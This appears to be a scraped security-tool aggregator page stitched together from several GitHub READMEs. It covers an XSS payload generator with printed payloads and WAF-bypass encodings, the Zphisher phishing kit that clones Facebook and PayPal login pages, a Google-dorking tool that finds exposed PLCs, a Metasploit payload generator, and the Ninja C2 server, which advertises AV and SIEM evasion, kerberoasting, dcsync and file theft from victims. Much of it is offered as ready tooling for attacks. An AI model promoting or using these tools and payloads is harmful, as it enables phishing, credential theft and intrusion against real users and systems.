Download FinalRecon

Starkiller is a Frontend for Powershell Empire. It is an Electron application written in VueJS. If you'd like to contribute please follow the Contribution guide.

Getting Started

To run Starkiller, you can download the installers for Mac, Linux, and Windows on the Releases page.
- For more info on running AppImage builds in Linux check out their website
If you want to build from source or run in development mode, instructions are below.

Install
Prerequisites:

Node.js 10+.
Yarn Currently it has been tested using Yarn 1.22.0.

yarn install

Compile and hot-reload for development

yarn electron:serve

Compile and minify for production

yarn electron:build

# Or to target a specific OS.
yarn electron:build:lin
yarn electron:build:win
yarn electron:build:mac

Changelog
Detailed changes for each release are documented in the release notes.

Stay In Touch

Download Starkiller

All in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER
Written by Hulya Karabag
Instagram: Hulya Karabag

Screenshots

How to use

Read Me

This tool creates payload for use in xss injection
Select default payload tags from parameter or write your payload
It makes xss inj. with Xss Scanner parameter
It finds vulnerable sites url with Xss Dork Finder parameter

Installation

Installation with requirements.txt

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Usage

python3 payloader.py

Features

*Basic Payload
Sets default parameter to :<script>alert(1)</script>

*Div Payload
Sets default parameter to :<div onpointerover='alert(1)'>MOVE HERE</div

*Img Payload
Sets default parameter to :<img src=x onerror=alert('1');>

*Body Payload
Sets default parameter to :<body ontouchstart=alert(1)>

*Svg Payload
Sets default parameter to :<svg onload=alert('1')>

*Enter Your Payload
Encodes payload writed by user

*Payload Generator Parameter
Encodes payload on selected tag

* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL ENCODE ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML ENTITY ENCODE----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  SPLIT PAYLOAD ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX ENCODE ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 ENCODE -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 ENCODE----->  Encode payload to utf-32 format.          
* |   9.  DELETE TAG -----> ";alert('XSS');//            
* |  10.  UNICODE ENCODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII ENCODE ----->  ¼script¾alert(1)¼/script¾      
* |  1   2.  BASE64 ENCODE ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 ENCODE ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  PARENTHESIS BYPASS ----->  <script>alert`1`</script>   
* |  15.  UTF-8 ENCODE ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* |  19.  INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* |  20.  MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* |  22.  SPACE BYPASS-----> <img^Lsrc=x^   Lonerror=alert('1');>
* |  23.  DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* |  25.  CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* |  26.  POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* |  27.  ALERT PAYLOADS-----> Show Alert Payload List
* |  28.  ALL CREATE PAYLOAD-----> Show Create All Payloads
* |  29.  GO BACK MAIN MENU
* |  30.  EXIT

*Xss Scanner
Initially you'll need to enter url of target Please enter the url like this example==>e.g target -----> http://target.com/index.php?name= Selected for scanning payload list

BASIC PAYLOAD LIST ==> Payload list consisting of script tag
DIV PAYLOAD LIST ==> Payload list consisting of div tag
IMG PAYLOAD LIST ==> Payload list consisting of img tag
BODY PAYLOAD LIST ==> Payload list consisting of body tag
SVG PAYLOAD LIST ==> Payload list consisting of svg tag
MIXED PAYLOAD LIST ==> Payload list consisting of all tag
ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Results will be added in "vulnpayload.txt" after scanning.

*Xss Dork Finder
First enter the dork for searching: e.g---->inurl:"search.php?q=" Results will be saved in "dork.txt" after scanning.

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

Support and Donations
Contact us with email capture0x@mail.com.tr
Copyright 2020

Download XSS-LOADER

Zphisher is an upgraded form of Shellphish. The main source code is from Shellphish . But I have not fully copied it . I have upgraded it & cleared the Unnecessary Files . Zphisher has 37 Phishing Page Templates ; including Facebook , Twitter & Paypal . It also has 4 Port Forwarding Tools . You can Find the Templates HERE

[+] Installation :

apt update
apt install git php openssh curl -y
git clone https://github.com/htr-tech/zphisher
cd zphisher
chmod +x zphisher.sh
bash zphisher.sh

Or ; Use Single Command

apt update && apt install git php curl openssh -y && git clone https://github.com/htr-tech/zphisher && cd zphisher && chmod +x zphisher.sh && bash zphisher.sh

[+] Credits :
[~] Some of the script is taken from Shellphish by thelinuxchoice .
[~] Some Phishing Pages are Generated by DarksecDevelopers ; UndeadSec ; thelinuxchoice& suljot_gjoka

[+] Features :
[+] Latest Login Pages !
[+] New Instagram Auto Follower Page !
[+] All types of Bugs Fixed !
[+] Useful for Beginners !

[+] Find Me on :
[~] Facebook
[~] Instagram
[~] Github

Download Zphisher

This tool is designed, developed and supported by evait security. In order to give something back to the security community, we publish our internally used and developed, state of the art network visualization and vulnerability reporting tool, 'envizon'. We hope your feedback will help to improve and hone it even further.

Website
https://evait-security.github.io/envizon/

Use Case
We use envizon for our pentests in order to get an overview of a network and quickly identify the most promising targets. The version 3.0 introduce new features such as screenshotting web services, organizing vulnerabilities or generating reports with custom docx templates.

Core Features:

Scan networks with predefined or custom nmap queries
Order clients with preconfigured or custom groups
Search through all attributes of clients and create complex linked queries
Get an overview of your targets during pentests with predefined security labels
Screenshot Visualize all http-like applications of your targets using chrome-headless (selenium) - VNC soon™
Save and reuse your most used nmap scans
Collaborate with your team on the project in realtime
Export selected clients in a text file to connect other tools fast
Manage issue template and create vulnerabilities linked to hosts in the database
Create customer reports with docx templates with one click

How to start?!
To avoid compatibility and dependency issues, and to make it easy to set up, we use Docker. You can build your own images or use prebuilt ones from Docker Hub.

Using Docker
Docker and Docker Compose are required.

Prebuilt Docker Images
Use the docker-compose.yml from the docker/envizon_prod directory and run it with docker-compose up.
The Docker image will be pulled from evait/envizon.
If you want to update the app image or pull it manually, you can do so with docker pull evait/envizon.
If you want to provide your own SSL-certificates, modify the docker-compose.yml according to your needs, otherwise they will be generated.
For the lazy ones:

wget https://raw.githubusercontent.com/evait-security/envizon/master/docker/envizon_prod/docker-compose.yml
echo SECRET_KEY_BASE="$(echo $(openssl rand -hex 64) | tr -d '\n')" > .envizon_secret.env
sudo docker-compose up

Running from local git checkout

git clone https://github.com/evait-security/envizon
cd envizon/docker/envizon_local
echo SECRET_KEY_BASE="$(echo $(openssl rand -hex 64) | tr -d '\n')" > .envizon_secret.env
sudo docker-compose up

Development
If, for whatever reason, you want to run the development environment in production, you should probably consider changing the secrets in config/secrets.yml, and maybe even manually activate SSL.

git clone https://github.com/evait-security/envizon
cd envizon/docker/envizon_dev
sudo docker-compose up

Usage

Set a password
After starting the docker images go to: https://localhost:3000/ (or http://localhost:3000 if not using SSL)
You have to specify a password for your envizon instance. You can change it in the settings interface after logging in.

Scan interface
On the scan interface you can run a new network scan with preconfigured parameters or your own nmap fu. You also have the possibility to upload previously created nmap scans (with the -oX parameter).
The scans are divided into smaller ones automatically to reduce the waiting time for results.
To specify scan destinations, you can use host names or IP addresses. IP addresses can be specified with or without subnet mask or CIDR prefix. To specify ranges, the individual parts of the IP can be separated with - or ,. These can be combined as desired. If the range is written out in full, only a - is permitted. Possible values as targets are:

scanme.nmap.org

192.168.1.1
192.168.1.0/24
192.168.1.0/255.255.255.0

192.168.1.1-192.168.1.10
192.168.1.1-192.168.10.254
192.168.1.0-192.168.10.0/24
192.168.1.0-192.168.10.0/255.255.255.0

192.168.1.1-10
192.168.1-10.1-10
192.168.1-10.0/24
192.168.1-10.0/255.255.255.0

192.168.1,2.1
192.168.1,2.1-10
192.168.1,2.0/24
192.168.1,2.0/255.255.255.0

Groups
The group interface is the heart of envizon. You can select, group, order, quick search, global search, move, copy, delete and view your clients. The left side represents the group list. If you click on a group you will get a detailed view in the center of the page with the group content. Each client in a group has a link. By clicking on the IP address you will get a more detailed view on the right side with all attributes, labels, ports and nmap output.
Most of the buttons and links have tooltips.

Global Search
In this section you can search for nearly anything in the database and combine each search parameter with 'AND', 'OR' & 'NOT'.
Perform simple queries for hostname, IP, open ports, etc. or create combined queries like: hostname contains 'win' AND mac address starts with '0E:5C' OR has port 21 and 22 open. The portlist provides the port count for all clients and lets you quickly identify rarely used ports.

Images
This page renders the images of all ports with visible/interactive content captured by starting a new scan on the images/scan-interface. Actually only web-services are converted into a PNG files using selenium and chrome-headless. The scan interface has two functions:

Re-Scan (check which port can be captured and add only new images)
Re-Scan with overwrite (delete all images from the database and take a screenshot from all possible ports)

Using the left groups sidebar you can filter all images by group. Please note, that any on-change updates (e.g. someone deletes a group) are disabled on this page to avoid any disturbance on the manual image reviewing process.

Vulnerabilty management and reporting
In the templates section you can create issue templates you want to reuse for your reports. You can set a title, severity, description, rating and recommendation. In the reports section you are able to create reports for your customers. First, you have to create an issue group for example "Internal network". In this group you can create new issues with the content of your issue templates and link them to existing clients in the database. You can easily add screenshots as proofs for your findings by using CTRL + v and pressing "update". The templates are linked to the new issues and can be updated with one click. Under edit current report you can edit basic information about the report itself for example the name of the customer or a management summary. The presentation mode allows you to hide all items exept the issues and their screenshots.
In order to create a great looking report you have to edit the docx template file under ./report-templates/envizon_template.docx. All variables used are included in the default template.

Import / Export
The complete project / database can be exported in the settings.
To import an exported zip file, you can select and upload it in the settings as well.
NOTE: This will overwrite any data in your current project, including all stored images!
Importing an exported project creates a temporary file in your envizon container, which will be only fully imported once your container has been restarted! This can be achieved by running docker-compose restart envizon. An additional backup of the previous PostgreSQL will be created and placed in the db subfolder in your envizon container at this point.

FAQ
API ?!

Currently not. We will work on it. Maybe.

Which browsers are supported?

Latest Chrome / Chromium / Inox & Firefox / Waterfox / Librewolf.

Why rails?!

Wanted to learn ruby. It's cool.

Why so salty on github issue discussion?

This is a community project. We are a full time pentesting company and will not go into / care about every open issue that doesn't match our template or guidelines. If you get a rough answer or picture e.g. from a fully underwhelmed cat, you probably deserved it.

What frameworks and tools were used?

Ruby on Rails
ruby-nmap (https://github.com/sophsec/ruby-nmap)
Materialize CSS (http://materializecss.com/)
Font Awesome Icons (https://fontawesome.com/)
Material Icons (https://material.io/icons/)
Many, many helpful gems

Help?
Of course you can open an issue and describe the problem you are facing with. Our team will try to response soon™.

Download Envizon

Katana-ds (ds for dork_scanner) is a simple python tool that automates Google Hacking/Dorking and support Tor
It becomes more powerful in combination with GHDB

Installation :
Use the package manager pip to install requirements

cd Katana
python3 pip install -r requirments
python3 katana-ds.py

Tested on Windows ConEmu

Usage :

cd Katana
python3 katana-ds.py -h (for help)
Options :
-g :for google mode
-s :for scada mode
-t :for tor mode
-p :for proxy mode
-b :for bitly mode

Google Mode :
Google mode gives you 2 inputs the "Dork" and the "TLD" (Top Level Domain) that gives you ability to search in specific countries.
e.g : com for Usa / co.ma for Morocoo / be for Belgium
For more please see the included TLDs.txt file.

Scada Mode :
Scada mode search in google for online PLCs this actually use multiple requests so your ip will be blocked by Google so changing the TLD will solve the probleme and the script provides inputs for that.
-!> this is just an example actually it shows a lot of results

Example of Allen-Bradley PLC dashboard found using Scada Mode

Tor Mode :
Tor mode gives you 1 input wich is the search query but before you should have tor proxy running on port 9050 this time there is no ip blocking the script search in 3 tor search engines Phobos,Tor66 and Tordex (more will be added)
-!> this is just an example actually it shows a lot of results

What if :

The script print 'Error too many requests' : change the TLD
Changing the TLD don't work : change your ip by disconnecting and reconnecting again
Tor mode show 'Failed to establish a new connection' : make sure that tor proxy up and running on port 9050

Proxy Mode :
Proxy mode find proxy servers and print them it will print 25 Different Proxy server Each time

Bitly Mode : (In Development)
Find intersting shorted links that somtimes lead to intersting website pages the script print currently 10 bitly links with their responses (script still in development if you got connection error or so many 404,403 just run it again)

Special thanks to :
LuongPhuHoa for the Recommendation

Download Katana

Framework RapidPayload - Metasploit Payload Generator

Requirements

OpenJDK 8 (JAVA), or superiors versions.
Metasploit
Apktool
Python3

Execution:

git clone https://github.com/AngelSecurityTeam/RapidPayload
cd RapidPayload
bash install.sh
python3 RapidPayload.py

AngelSecurityTeam

Download RapidPayload

Ninja C2 is an Open source C2 server created by Purple Team to do stealthy computer and Active directoty enumeration without being detected by SIEM and AVs , Ninja still in beta version and when the stable version released it will contains many more stealthy techinques and anti-forensic to create a real challenge for blue team to make sure all the defenses configured correctly and they can detect sophisticated attacks.
Ninja use python to server the payload and control the agents . the agents are based on C# and powershell which can bypass leading AVs . Ninja comunicate with the agents in secure channel encrpyted with AES-256 and the key is not hard coded but randomly generated on the campaign start , every agent connect to the C2 get the key and if the C2 restarted a new key will be used by all old agents and the new. Ninja also randomize the callback URLs for every campaign to bypass static detection.

The main feature in Ninja is called DA ( Defense Analysis ), which will do the required enumeration to get below important information and do analysis on them to get score for system defenses and sandbox detection .
Detect SIEM solutions : right now it detect SPlUNK , Log beat collector , sysmon.
detect AV using two ways , using powershell command and using processes.
check if the powershell logging enabled
check if the user have admin privileges
provide information about system : host name , OS , build number , local time , time zone , last boot and bios .
provide information about the installed security updates.
provide a System pwn hardness score based on multiple factors.
provide a sandbox detection score based on ( privileges , bios manufacturer , joined to domain or not , existence of sysinternals processes ).
show all domain users ( using powershell commands ).
show all domain groups ( using powershell commands ) .
show all domain computers ( using powerview.ps1 - taken from : https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1 ).
show available shares.

Ninja is designed to be easy to setup and to add more commands and do automation for boring tasks. you can find many short commands that a red teamer struggle to memorize and search for them. please check this article to know more about ninja : https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/

Ninja key features
Ninja is packed with a number of features that allows you to gain an insight into your upcoming engagement before you actually need to deploy your full aresenal or tools and techniques, such as:

Defense Analysis
automation for kerberoast attack from generating the kerberos tickets to extracting the SPN hashes into hashcat format.
automation for dc_sync to get hashes for a list of users or domain admin group.
Undetected Automation to get groups the user belong to and the users member in a group.
Automation for bloodhound AD data collection .
customized c# payloads that encrypt strings to bypass static detection.
encode any command you want to unicode base64 to be used in powershell encoded commands.
full encryption of all communications between Agent and command and control to bypass AV and IPS detection.
dynamic URLs for all function , just place your list of url names and the c2 will use it randomly to bypass any static detection.
get random encryption key on the fly ( not hard coded ) every time the agent connect ( even reconnection needs a new key )
take screenshots and send it encrypted to C2
upload files from C2 to victim encrypted to bypass AV and IPS
download files from the victim encrypted to bypass AV and IPS
staged payloads to bypass detection ( base64 and base52 )
bypasses AVs ( tested on kaspersky and trendmicro )
Bypasses SIEM detection ( tested on splunk collecting usual event logs along with sysmon logs ) not tested on powershell v5 script block and module logging ( will be done in the next release ).
set the beacon interval dynamically even after the agent connected and provide a starting beacon interval in the campaign start configurations
logging for all commands and results in order to return to any data you missed in your operation.
set the configuration one time when you start the campaign and enjoy.
global kill switch to end campaigns.
delete table entries.
all the payload written to payloads folder for easy access and further customization.
easy to add automation for any command you want.

Requirement
please note that compling C# depends on the System.Management.Automation.dll assembly with SHA1 hash c669667bb4d7870bc8bb65365d30071eb7fb86fe.
Some Ninja Commands require below modules ( already exist in modules ) which you need to get updates from their repo :
Invoke-Kerberoast : https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1
Invoke-Mimikatz : https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
Sharphound : https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1
PowerView : https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1

Installation
First of all make sure to download the latest version of Ninja using the following command :
git clone https://github.com/ahmedkhlief/Ninja/
You need to setup Ninja by running install.sh script :
chmod +x ./install.shsudo ./install.sh
After that you need to initialize the campagin :
python start_campaign.py
Now you can start the Ninja server :
python Ninja.py
You will by greeted with the following once you run it :




            88             88             
            ""             ""                           
                                              88888      8888
8b,dPPYba,  88 8b,dPPYba,  88 ,adPPYYba,    88        88    88
88P'   `"8a 88 88P'   `"8a 88 ""     `Y8    88              88
88       88 88 88       88 88 ,adPPPPP88    88              88
88       88 88 88       88 88 88,    ,88    88            88
88       88 88 88       88 88 `"8bbdP"Y8    88          88  
                          ,88                 88888      888888
                        888P"         
         V1.0.1 BETA !


 Ninja C2 | Stealthy Pwn like a Ninja

+------------------------------------------------------------+
 Command        Description                                                                        
 -------        -----------                                                                         exit           Exit the console , or kill the agent                                               
 list           List all agents                                                                    
 help           Help menu                                                                          
 show           Show Command and Controler variables                                               
 use            Interact with AGENT                                                                
 back           Back to the main                                                                   
 payload        Show Payloads                                                                      
 load           load modules                                                                       
 kill_all       kill all agents                                                                    
 delete         delete agent from the list                                                            
 delete_all     delete all agents in the list                                                      
 set-beacon     set the beacon interval live for agent                                             
 download       download file from the vicitm                                                      
 downloads      list downloaded files                                                              
 upload         upload files to the victim                                                         
 modules        list all the Available modules in Modules directory                                
 encode64       encode any command to base64 encoded UTF-8 command ( can be decoded in powershell)
 screenshot     take screenshot form  the victim                                                   
 DA             Run defense Analysis Module                                                        
 kerb              do kerberoast attack  and dump  service accounts hashes                            
 dcsync_admins  do dcsync attack agains domain admins group                                        
 dcsync_list    do dcsync attack agains custom user list                                           
 get_groups     get all the groups user is member of                                               
 get_users      get all the users member in group                                                  
 bloodhound     run bloodhound to collect all the information about the AD                 
+------------------------------------------------------------+

Usage
Please check this article about Ninja and how to use it : https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/.

Todo

Enhance DA module and add more SIEM , AV and sandbox detection along with more important eenumeration data.
more focus on stealth to load agent parts only when needed
add more shortend commands for popular modules
add more customizations and ideas for phishing using C# payloads and macros
integration with curveball exploit
integration with new exchange RCE
Undetectable Persistence
create a wipe command to securly remove files on hard disk without being detected and analyzed by blue team.
make the agent blocks changes randomly to bypass any static detection
add obfuscation for the agents.
integrate cobalt strike payloads

Screenshots
Main Screen

Payloads

Agent List

Upload file

Download File

Download Ninja

ConEmu-Maximus5 is a Windows console emulator with tabs, which represents multiple consoles as one customizable GUI window with various features.
Initially, the program was created as a companion to Far Manager, my favorite shell replacement - file and archive management, command history and completion, powerful editor.
Today, ConEmu can be used with any other console application or simple GUI tools (like PuTTY for example). ConEmu is an active project, open to suggestions.

Some links
Wiki: https://conemu.github.io/en/TableOfContents.html
What's new: https://conemu.github.io/en/Whats_New.html
Release stages: https://conemu.github.io/en/StableVsPreview.html
Donate this project: https://conemu.github.io/donate.html

Description
ConEmu starts a console program in hidden console window and provides an alternative customizable GUI window with various features:

smooth window resizing;
tabs and splits (panes);
easy run old DOS applications (games) in Windows 7 or 64bit OS (DosBox required);
quake-style, normal, maximized and full screen window graphic modes;
window font anti-aliasing: standard, clear type, disabled;
window fonts: family, height, width, bold, italic, etc.;
using normal/bold/italic fonts for different parts of console simultaneously;
cursor: standard console (horizontal) or GUI (vertical);
and more, and more...

Far Manager related features

tabs for editors, viewers, panels and consoles;
thumbnails and tiles;
show full output (1K+ lines) of last command in editor/viewer;
customizable right click behaviour (long click opens context menu);
drag and drop (explorer style);
and more, and more...

All settings are read from the registry or ConEmu.xml file, after which the command line parameters are applied. You may easily use several named configurations (for different PCs for example).

Requirements

Windows 2000 or later.

Installation
In general, ConEmu installation is easy. Just unpack or install to any folder and run ConEmu.exe.
Read Installation wiki about release stages, distro packets, some warnings and much more...

Building from sources
https://github.com/Maximus5/ConEmu/blob/master/src/HowToBuild.md

Screenshots

More screenshots

Download ConEmu

Lazydocker - The Lazier Way To Manage Everything Docker

Sshuttle - Transparent Proxy Server That Works As A Poor Man'S VPN. Forwards Over SSH

Chepy - A Python Lib/Cli Equivalent Of The Awesome CyberChef Tool.

xShock - Shellshock Exploit

InstaSave - Python Script To Download Images, Videos & Profile Pictures From Instagram

Maryam v1.4.0 - Open-source Intelligence(OSINT) Framework

XXExploiter - Tool To Help Exploit XXE Vulnerabilities

uDork - Google Hacking Tool

HTTPS Everywhere - A Browser Extension That Encrypts Your Communications With Many Websites That Offer HTTPS But Still Allow Unencrypted Connections

Astra - Automated Security Testing For REST API's

ScoringEngine - Scoring Engine For Red/White/Blue Team Competitions

FinalRecon v1.0.2 - OSINT Tool For All-In-One Web Reconnaissance

Starkiller - A Frontend For PowerShell Empire

XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder

Zphisher - Automated Phishing Tool

Envizon v3.0 - Network Visualization And Vulnerability Management/Reporting

Katana - A Python Tool For Google Hacking

RapidPayload - Metasploit Payload Generator

Ninja - Open Source C2 Server Created For Stealth Red Team Operations

ConEmu - Customizable Windows Terminal With Tabs, Splits, Quake-Style, Hotkeys And More